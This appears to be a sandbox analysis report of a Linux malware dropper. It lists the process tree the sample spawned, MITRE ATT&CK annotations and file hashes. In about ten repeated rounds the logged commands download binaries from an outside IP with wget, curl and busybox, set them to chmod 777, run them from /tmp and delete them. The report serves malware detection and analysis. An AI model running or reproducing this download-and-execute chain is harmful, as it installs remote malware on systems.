-
/usr/bin/curlcurl -O http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:878
-
-
/bin/chmodchmod 777 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw./n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:884
-
-
/bin/chmodchmod 777 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj./xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:894
-
-
/bin/chmodchmod 777 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk./vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:901
-
-
/bin/chmodchmod 777 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la./tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:907
-
-
/bin/chmodchmod 777 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b./OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:913
-
-
/bin/chmodchmod 777 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV./HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:919
-
-
/bin/chmodchmod 777 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM./ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:925
-
-
/bin/chmodchmod 777 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc./tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:931
-
-
/bin/chmodchmod 777 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa./fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:934
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:937
-
-
/bin/chmodchmod 777 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc./Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:940
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97